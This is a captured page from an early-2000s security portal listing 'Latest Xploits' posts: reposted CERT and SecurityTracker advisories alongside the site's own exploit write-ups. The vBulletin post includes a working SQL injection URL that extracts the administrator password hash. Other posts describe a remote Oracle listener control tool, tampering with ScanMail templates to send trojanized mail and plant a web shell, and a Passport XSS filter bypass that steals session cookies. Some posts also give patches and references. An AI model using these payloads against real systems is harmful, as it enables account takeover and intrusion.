E-Books Online     E-Books Download     DokFLeed.Net Tools     Smoking Kills Search The Site
   
Labrova PHP Sheild Protection              
Portal Services
· Home
· PHP JAVA & Poems
· Topics

Users Info
Welcome, AnonyDok
Nickname
Password
(Register)
Membership:
Latest: touch55girl
New Today: 0
New Yesterday: 0
Overall: 48479

People Online:
Visitors: 17
Members: 0
Total: 17

DokFLeed.Net --Security Portal: Latest Xploits

Search on This Topic:   
[ Go to Home | Select a New Topic ]

Topic Articles: POP3 Server provided with the CPanel suite
Latest Xploits POP3 Server provided with the CPanel suite tested on version [cppop 20.0], ingores full length of email login password. it only counts the first 8 characters. this reduces the work factor to crack an email account.
Posted by DokFLeed on Sunday, September 04 @ 11:18:31 EDT (4081 reads)
(Read More... | 14 comments | Topic Articles | Score: 3)



Topic Articles: Vb Bulletin Last 10 posts Vulnerability
Latest Xploits
Information

VBulletin PHP Forums, enable add-on features using what is called "Hacks" 
which are pieces of codes that extend the forum functionality. One of the 
famous hacks, is scrolling the last 10 posts through an IFRAME embedded in 
the forum header template.


Discussion

the hack last Posts, started with version
//...........Last X Posts v1.0.5...........
//......by Kevin (kevin@tubescan.com)......
it had a file called "last10config.php" , with the line
# $showforumtitle = "0"; // shows the forum title (linked to that forum) 
next to the thread title
which called this part of the script
#
if ($showforumtitle == "1") {
        $ftitle = ",forum";
        $fsel = ",forum.title AS ftitle";
        $wheresql .= " AND
thread.forumid=forum.forumid";
}
#
Later on on other versions such as
//...............Last 10 Posts v2.0.1...........
//.........by Kevin (kevin@tubescan.com)........
//.....Edit by lad_pc (lad_pc@hotmail.com)......

the options were removed, as well as the part of the code on the 
corresponding file , yet the SQL statement remained the same as follows
# $query = "SELECT
thread.lastpost,thread.title,thread.lastposter,thread.r
eplycount,thread.views,user.userid,thread.threadid,thre
ad.forumid$fsel,thread.iconid FROM thread,user$ftitle
$wheresql ORDER BY thread.$ob $obdir LIMIT
$maxthreads";

which leaves both $fsel and $ftitle for SQL Injections


Exploit

any none patched website running any version of VB with this hack is 
vulnerable as follows
#/last.php?fsel=,user.password%20as%20title,user.%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20WHERE%20usergroupid=1%20LIMIT%201/*

This will output the VB Administrator Encrypted Password, with some cookie 
editing you log on to the VB again as the OWNER :) quite annoying


Solution

for easy solution if you do not want to mess up much just add these 2 lines 
before the SQL query in file "ttlast.php"
 it should look as follows
$fsel="";
$ftitle="";
$query = "SELECT
thread.lastpost,thread.title,thread.lastposter,thread.r
eplycount,thread.views,user.userid,thread.threadid,thre
ad.forumid$fsel,thread.iconid FROM thread,user$ftitle
$wheresql ORDER BY thread.$ob $obdir LIMIT
$maxthreads";
Save file and you are patched

Published on http://www.securityfocus.com/bid/11825/
Posted by DokFLeed on Saturday, December 04 @ 12:21:24 EST (5411 reads)
(Read More... | Topic Articles | Score: 4.5)



Topic Articles: Oracle TNSLSNR Full Client
Latest Xploits Most of admins neglect setting password on TNSlsnr Clients for Oracle databases. Oracle ensures that you can either connect to TNSlsnr on a localhost or through mapping to a remote Oracle database using .ora files.
This is not the case anymore Based on Jwa perl client.
This client is a FULL client, with Packet crafting reassembled.
Supports all the commands as the version that is shipped with Oracle.
Allow you to totally control an unprotected Oracle Database Server remotelly , without having to map or install Oracle.
Download Here

Commands Supported
ping , version , service , status change_password, help, reload, save_config, set connect_timout set display_mode, set log_directory , set log_file , set log_status , show , spawn stop


this version works on Oracle9i.
On Oracle 10g only "version" command is working.


This is feedback i got from Pete Finnigan Oracle Security
The 10g listener is by default protected by local authentication rather than by a password like in the 9i and lower listener. This means that because it is protected you cannot use commands like status which can only be used on an un-protected listener. This is the reason that the version command still works, because it can be executed on a password or locally authenticated listener. To be able to get the lsnrctl tool to work remotely you need to disable local authentication.

Currently, i am working on 10g version with D.O.S check , well if you can't own it see if you can bring it down!!



If you have Oracle10g on a public IP and want to share it for testing let me know , just send me the IP by Email
Posted by DokFLeed on Monday, September 27 @ 11:02:02 EDT (45451 reads)
(Read More... | 3403 bytes more | Topic Articles | Score: 4.26)



Topic Articles: Lotus Notes & ScanMail Exploit Tool
Latest Xploits

Public Release for ScanMail Vulnerability
I was not sure to release this one or not, but apparently I did.
While reading http://www.trendmicro.com/ftp/documentation/guides/smd3-admin-guide.pdf,
Starting Page : 108 things became interesting. What if some Admin did not follow the guide!
On Lotus Domino Server, Trend ScanMail can be installed as the server's antivirus, according to the guide
some interesting templates can enable the Administrator to control the ScanMail through a web-enabled
Interface. these templates are smency.nsf, smconf.nsf, smvlog.nsf, smquar.nsf, smmsg.nsf, smtime.nsf, smhelp.nsf, smftypes.nsf
Coding a quick scanner searching for this file using NASL /Nessus ,http://cgi.nessus.org/plugins/dump.php3?id=14312
and thanks to the Guys on Nessus for upgrading my original script.

Anyway, these files in general can allow you to

  1. Gather more information about the target system
  2. Edit/Delete virus pattern files, then email your own trojanized emails, which will be treated by victims as trusted scanned email.
  3. With some tweaking you can upload a web-shell script and increase your access.

Tools Released

  1. Check for most of the Lotus Server Templates in General Download Here
    If URL is not found then Risk Clear.
    If found but password protected then Risk Low.
    If found with no protection then Risk High.
    Checks also for dying servers and firewall protected HTTP error messages.
  2. http://cgi.nessus.org/plugins/dump.php3?id=14312

To Read More about the templates you can target
http://it.trendmicro-europe.com/enterprise/support/knowledge_base_detail.php?solutionId=19621

Updated Section on 10th Nov 2004 : References

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1003
  2. http://securitytracker.com/alerts/2004/Nov/1012082.html
  3. http://www.securityfocus.com/bid/11612
  4. http://xforce.iss.net/xforce/xfdb/17962

Posted by DokFLeed on Monday, September 27 @ 00:00:00 EDT (2387 reads)
(Read More... | Topic Articles | Score: 4.5)



Topic Articles: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Poss
Latest Xploits

SecurityTracker Alert ID: 1004636
CVE Reference: CAN-2002-0653 (Links to External Site)
Date: Jun 27 2002
Impact: Denial of service via local system, Execution of arbitrary code via local system, Modification of user information, User access via local system
Fix Available: Yes Vendor Confirmed: Yes
Version(s): 2.4.9 and prior
Description: A vulnerability was reported in mod_ssl. A local user that can create '.htaccess' files may be able to cause mod_ssl to crash or execute arbitrary code on the system with the privileges of the web server.
An 'off-by-one' error has been reported in mod_ssl. The flaw reportedly exists in the ssl_compat_directive() while invoking the Apache web server rewrite_command extended API (EAPI) hook. According to the report, when backward compatibility is enabled, mod_ssl registers a rewrite_command hook and calls the ssl_compat_directive() function for every line read in a configuration file.
A local user that can create a '.htaccess' file on the web server can place specially crafted information in the file to cause Apache mod_ssl to execute arbitrary code when reading the file (e.g., when a remote user attempts to access a file in a directory protected by the '.htaccess' file).
Servers that allow virtual hosts and have the "AllowOverride" directive not set to "None" for virtual hosts may be affected if local users have access to any part of the web directory. Other configurations may also be vulnerable.
According to the report, mod_ssl compiled without backward compatibility is not vulnerable. However, the backward compatibility feature is reportedly enabled by default during compilation.
Impact: A local user could cause denial of service conditions or could possibly execute arbitrary code with the privileges of the web server.
Solution: The vendor has released a fixed version (2.8.10), available at:
http://www.modssl.org/
Vendor URL: www.modssl.org/ (Links to External Site)
Cause: Boundary error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: Jedi/Sector One
Message History: This archive entry has one or more follow-up message(s) listed below. Jul 2 2002 (Debian Issues Fix) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Robert van der Meulen ) Debian has issued a fix.
Jul 3 2002 (EnGarde Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (engarde-announce-admins@guardiandigital.com) EnGarde has released a fix.
Jul 5 2002 (Sun Issues Workaround for Cobalt RaQ) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code Sun has issued a workaround for Cobalt RaQ.
Jul 18 2002 (Red Hat Issues Fix) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (bugzilla@redhat.com) Red Hat has issued a fix.
Jul 19 2002 (HP Issues Fix for HP Secure OS for Linux) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (support_feedback@us-support-mail.external.hp.com (IT Resource Center )) HP has released a fix for HP Secure OS for Linux.
Jul 20 2002 (NetScreen Issues Fix for Global PRO Policy Manager) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code NetScreen has issued a patch for their Global PRO and PRO Express Policy Manager Server.
Jul 31 2002 (SuSE Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Roman Drahtmueller ) SuSE has released a fix.
Aug 4 2002 (Apple Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Product Security ) Apple has released a fix.
Aug 9 2002 (Mandrake Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Mandrake Linux Security Team ) Mandrake has released a fix.
Sep 24 2002 (HP Issues Fix for Virtualvault) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code HP has issued a fix for HP-UX Virtualvault.
Jan 28 2003 (Sun Issues Fix for Cobalt RaQ) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code Sun has issued a fix for mod_ssl on Sun Cobalt RaQ devices.
Jan 28 2003 (Sun Issues Fix for Cobalt Qube) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code Sun has issued a fix for the Cobalt Qube device.

Posted by DokFLeed on Monday, June 02 @ 00:00:00 EDT (1464 reads)
(Read More... | Topic Articles | Score: 4.33)



Topic Articles: Windows Media Player May Let Remote Users Execute Code on a Target User's Comput
Latest Xploits

SecurityTracker Alert ID: 1004638 CVE Reference: CAN-2002-0372 , CAN-2002-0373 , CAN-2002-0374 (Links to External Site) Date: Jun 27 2002 Impact: Disclosure of system information, Execution of arbitrary code via local system, Execution of arbitrary code via network, Root access via local system, User access via network Fix Available: Yes Vendor Confirmed: Yes Version(s): 6.4, 7.1, XP Description: Microsoft reported several vulnerabilities in Windows Media Player. A remote user could execute arbitrary programs or arbitrary scripting code on the user's computer. Also, a local user can execute arbitary code on the system with System level privileges. Microsoft described several new vulnerabilities in Windows Media Player. These issues are discussed separately below. First, an information disclosure vulnerability involving the Internet Explorer (IE) Cache directories could allow a remote user to run code on a target user's computer. The code would run with the privileges of the user running Windows Media Player. This bug is reportedly caused by the player's processing of certain types of licenses for secure media files when the media file is stored in the IE cache. A remote user can supply a certain type of secure Windows Media file (using WM DRM version 1.0) to the user such that, when the file is opened, the media player will incorrectly return information to the server that discloses the location of the IE cache while it is processing the request to the web site specified for handling the licensing information. A remote user could learn of the location of the IE cache on the target user's local file system and, separately, cause an executable program to be stored in the cache (by sending the user HTML-based e-mail or getting the user to visit a particular web page). Then, the remote user could then directly access (and execute) the stored executable. In certain configurations, it is reportedly possible for an HTML email to attempt to play a media file automatically, allowing an exploit to occur when the target user views or previews a malicious e-mail message. Second, a local authenticated user could execute arbitrary commands with System level privileges to take full control of the operating system. The bug reportedly exists in the Windows Media Device Manager (WMDM) Service processing of requests to access invalid local storage devices. WMDM is a component of Windows Media Player and is only used in Windows 2000. So, this flaw reportedly only affects Windows Media Player 7.1 on Windows 2000 systems. A local user may be able to provide a specially crafted request to connect to an invalid device to gain access to a local resource and execute any local program with LocalSystem privileges. According to Microsoft, a console session is required to exploit this privilege escalation flaw. Lastly, a remote user could supply and invoke an HTML script on a target user's computer. The script could take any actions acting as the target user. The flaw is reportedly due to the storage of the Windows Media active playlist information on the local system in a known location. Playlists typically have a '.asx' extension and are XML-based (and can include HTML script). So, a remote user can exploit this to store and then invoke HTML script in the Local Computer security zone. A remote user can create a specially formatted media file (that includes a malicious playlist). If this playlist is in the memory when the Windows Media Player is exited (on the target user's computer), the player will write the playlist to a known location on the target user's computer. The remote user can then create a malicious web page that, when subsequently viewed by the target user, will cause the playlist to be executed. The HTML script in the playlist will then run on the target user's computer in the Local Computer zone. According to the security bulletin, this bug requires several specific, ordered exploit steps: 1) The target user plays specially crafted media file supplied by the remote user. 2) The target user shuts down the media player after playing the file and before playing any other files. 3) The target user views a web page supplied by the remote user. Microsoft credits jelmer for reporting the Cache Patch Disclosure bug, the Research Team of Security Internals for reporting the Privilege Elevation via Windows Media Device Manager Service issue, and Elias Levy for reporting the Media Playback Script Invocation bug. Impact: A remote user can cause arbitrary code or arbitrary scripts to be executed on the target user's computer. A local user can execute commands with System privileges to gain full control of the operating system. Solution: The vendor has released patches. For Microsoft Windows Media Player 6.4: http://download.microsoft.com/download/winmediaplayer/Update/320920/W98NT42KMe/EN-US/wm32092 0_64.exe For Microsoft Windows Media Player 7.1: http://download.microsoft.com/download/winmediaplayer/Update/320920/W982KMe/EN-US/wm320920_71.exe For Microsoft Windows Media Player for Windows XP: http://download.microsoft.com/download/winmediaplayer/Update/320920/WXP/EN-US/wm320920_8.exe The patches for 6.4 and 7.1 can reportedly be installed on any operating system running Windows Media Player 6.4 or 7.1. The patch for Windows Media Player for Windows XP can be installed on Windows XP Gold. Microsoft plans to include the fix in Windows XP SP1. This patch supersedes the patches referenced in Microsoft's previous security bulletin MS01-056. Microsoft plans to issue Knowledge Base article Q320920 regarding this issue, to be available shortly at the Microsoft Online Support web site: http://search.support.microsoft.com/kb/c.asp?SD= SO&LN=EN-US Vendor URL: www.microsoft.com/technet/security/bulletin/MS02-032.asp (Links to External Site) Cause: Access control error, Configuration error, Input validation error Underlying OS: Windows (Any) Reported By: secnotif@microsoft.com Message History: None.

Posted by DokFLeed on Monday, June 02 @ 09:43:09 EDT (1611 reads)
(Read More... | Topic Articles | Score: 4.5)



Topic Articles: mSN Xploit
Latest Xploits -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-13 Buffer Overflow in Microsoft's MSN Chat ActiveX Control Original release date: May 10, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Microsoft Windows systems with one or more of the following: * Microsoft MSN Chat control * Microsoft MSN Messenger 4.6 and prior * Microsoft Exchange Instant Messenger 4.6 and prior Overview Microsoft's MSN Chat is an ActiveX control for Microsoft Messenger, an instant messenging client. A buffer overflow exists in the ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. I. Description A buffer overflow exists in the "ResDLL" parameter of the MSN Chat ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. This vulnerability affects MSN Messenger and Exchange Instant Messenger users. Since the control is signed by Microsoft, users of Microsoft's Internet Explorer (IE) who accept and install Microsoft-signed ActiveX controls are also affected. The Microsoft MSN Chat control is also available for direct download from the web. The tag could be used to embed the ActiveX control in a web page. If an attacker can trick the user into visiting a malicious site or the attacker sends the victim a web page as an HTML-formatted email or newsgroup posting then this vulnerability could be exploited. This acceptance and installation of the control can occur automatically within IE for users who trust Microsoft-signed ActiveX controls. When the web page is rendered, either by opening the page or viewing the page through a preview pane, the ActiveX control could be invoked. Likewise, if the ActiveX control is embedded in a Microsoft Office (Word, Excel, etc.) document, it may be executed when the document is opened. According to the Microsoft Advisory (MS02-022): It's important to note that this control is used for chat rooms on several MSN sites in addition to the main MSN Chat site. If you have successfully used chat on any MSN-site, you have downloaded and installed the chat control. The CERT/CC has published information on ActiveX in Results of the Security in ActiveX Workshop (pdf) and CA-2000-07. This issue is also being referenced as CAN-2002-0155: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0155 II. Impact A remote attacker may be able to execute arbitrary code with the privileges of the current user. III. Solution Apply a patch from your vendor Microsoft has released a patch, a fixed MSN Chat control, and upgrades to address this issue. It is important that all users apply the patch since it will prevent the installation of the vulnerable control on systems that have not already installed it. Download location for the patch: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=38790 Download location for updated version of MSN Messenger with the corrected control: http://messenger.msn.com/download/download.asp?client=1&update=1 Download location for updated version of Exchange Instant Messenger with the corrected control: http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp Microsoft also suggests that the following Microsoft mail products: Outlook 98 and Outlook 2000 with the Outlook Email Security Update, Outlook 2002, and Outlook Express will block the exploitation of this vulnerability via email because these products will open HTML email in the Restricted Sites zone. Other mitigation strategies include opening web pages and email messages in the Restricted Sites zone and using email clients that permit users to view messages in plain-text. Likewise, it is important for users to realize that a signed control only authenticates the origin of the control and does not imply any information with regard to the security of the control. Therefore, downloading and installing signed controls through an automated process is not a secure choice. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#713779) or contact your vendor directly. Microsoft See http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-022.asp _________________________________________________________________ The CERT/CC acknowledges the eEye Team for discovering and reporting on this vulnerability and thanks Microsoft for their technical assistance. _________________________________________________________________ Feedback can be directed to the author: Jason A. Rafail ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-13.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 10, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPNws56CVPMXQI2HJAQGUUQP/ZsyoPxzyttkDCaqvD8V7fu/dWWyUFPrk qYTu2CUfZtuGdmpZ91sR8jWn3BAgEiIiF5sIXMckqjApNDORkLdt1sIo5ddkX4qR k1JO0sAiNITtUAXwx3vsv36EYCtL+JaX5jmMrZffZvxjM1PzbmxGD7NVOvtGQtGB MUEDOZLJe44= =TqFl -----END PGP SIGNATURE-----
Posted by DokFLeed on Monday, May 27 @ 03:46:04 EDT (2828 reads)
(Read More... | Topic Articles | Score: 4.2)



Topic Articles: MSN Passport HiJack
Latest Xploits Microsoft Passport Microsoft Passport: "A single name, password and wallet for the web". This means that using the same credentials you can access your e-mail (Hotmail), instant messenger service (MSN messenger), calendar (task manager, reminders and so on), and loads of other useful services. All these services are centralized and authenticate with a central system called MS passport. Of course as much as any authorised user can browse without supplying a password from a service which makes use of the Passport technology to another, a cracker (malicious hacker) can do the same without much problems once he gets to look like the authorized user. This kind of service is intended for personal use, so people certainly wouldn’t like others to read their e-mail, or view their daily schedule. Implementation Microsoft is trying to build everything around their Network, using Passport authentication. This is complaint with the .NET framework, which allows everything to be seamlessly integrated so that users can jump from one service to another without any problems. As currently implemented, users can authenticate to Passport via a number of ways: Hotmail and Passport sites MSN messenger MSN Explorer Outlook Express Other MS applications. Fooling the system JavaScript allows users to set and retrieve cookies. This is very useful for normal HTTP sites as well as Web Applications. However Web Applications need a lot more control over normal websites. This control is normally achieved through filtering of possibly malicious code in the HTML. Users do not need permission to send e-mails to authenticated users, giving them the possibility to post data to an authenticated user’s mailbox. This is obvious to some extent, since we are talking about e-mail. No one needs authentication to send an e-mail to a Hotmail account. Therefore the e-mail sent to the Hotmail user has to be treated as non-trusted content. Hotmail takes very good care to filter out JavaScript, ActiveX and Java applets. Lately it also started checking for images which link to outside the Hotmail account. Having images linking to non-trusted sites means that those sites can easily track the status of the e-mail (if it was read or not). So that a tag in an html mail such as: img src=”http://spam.me.com/tracking.gif" would get filtered by the Hotmail Filtering System. To get around this filtering, one has to just encode the http:// part like &x68;ttp://. 68 is the hex value h, and therefore the Web Browser converts back the encoded value to its original signifier. Of course, the Hotmail filtering system is not working exactly like the Web Browser, and this is where the flaw stands out. However this is not the major issue I am writing about in this document. Cross Site Scripting When a logged in user follows an non-trusted link, the Hotmail credentials do not get sent to the website. The Hotmail filtering system also takes care to hide the URL of the user’s Hotmail account to ensure his privacy (and maybe to prevent other attacks). On the other hand, when a user follows an MSN (Passport and therefore trusted) site from a non-trusted e-mail, the credentials get sent to the Passport site, and no precautions are taken. This means that the Passport authentication is not broken and therefore the different services provided by MS Passport operate seamlessly as described earlier. This also means that if an ASP script which resides on any MS Passport enabled site allows the user to customise the page (even if not intended) such as inserting JavaScript code, the whole system is flawed. In my exploit, a user only needs to click on a trusted link and he (or she) will be sending his (or her) credentials to a remote server. How is this achieved? To further explain the issue, I will provide an example of a flawed ASP script on an MS Passport site: ErrorMsg.asp, which resides on http://auctions.msn.com/Scripts/ This ASP script can be passed 2 (or possibly more) arguments: · Source · ErrMsg Here we are concerned with ErrMsg argument. This argument allows different scripts to generate different errors and display them to the user in some nice html. ErrMsg will usually be filled in with something like “User is not authenticated”. Now what if it is filled with This should be bold. To my astonishment (at the time of writing this is not fixed yet), I got the HTML tag to work, with no filtering from the ASP script. To further illustrate this, the url which is passed is actually: http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=This%20should%20be%20bold. If no filtering is done for JavaScript, we can very easily inject our own JavaScript code to retrieve the session cookie stored in the Hotmail user’s browser. Sadly, lately (during the writing of this document), Microsoft seemed to try to fix this by filtering JavaScript (and embedded scripts) tags and entities. This means when the ASP script is passed the following: · Script · Alert · JavaScript: · And other commonly used javascript methods the ASP script simply ignores the input, successfully filtering common Cross Site Scripting attacks. However Microsoft did not fully patch the issue, so that if HTML encoding were used, the filtering system would not detect the embedded script code, and the code would still be executed. This means that to produce an alert box to display the session cookies, instead of simply using something like: http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg= We have to encode the URL such as: http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg= To complete the exploit the malicious user has to send a URL, which actually passes the Cookie to a 3rd party CGI script (probably made by the cracker exploiting this issue) instead of displaying them to the Hotmail user in a Message box. The end picture could look very similar to the one below.
Posted by Moby on Saturday, March 09 @ 04:41:25 EST (6367 reads)
(Read More... | 6515 bytes more | 7 comments | Topic Articles | Score: 0)



ICAT Scanner
Search for Vulnerabilities
Enter vendor, software, or keyword

Virus Alert

Encyclopedia
· Networks
· Scripting Languages
· Programming
· Mail
· Terminology
· Servers
· HTTP

Google Search
Google


Hotmail
MSN




Top10 Downloads
· 1: DokScript
· 2: IIS URL Scan
· 3: FixSbigF
· 4: Stinger
· 5: Anti Trojan
· 6: Sniff
· 7: Aphex Worm Removal
· 8: mIRC Worms & Trojan Scanner
· 9: ICMP Monitor
· 10: Aplore APhex Cleaner

Forums


DokFLeed.Net --Security Portal Forums



 

You can syndicate our news using the file backend.php or ultramode.txt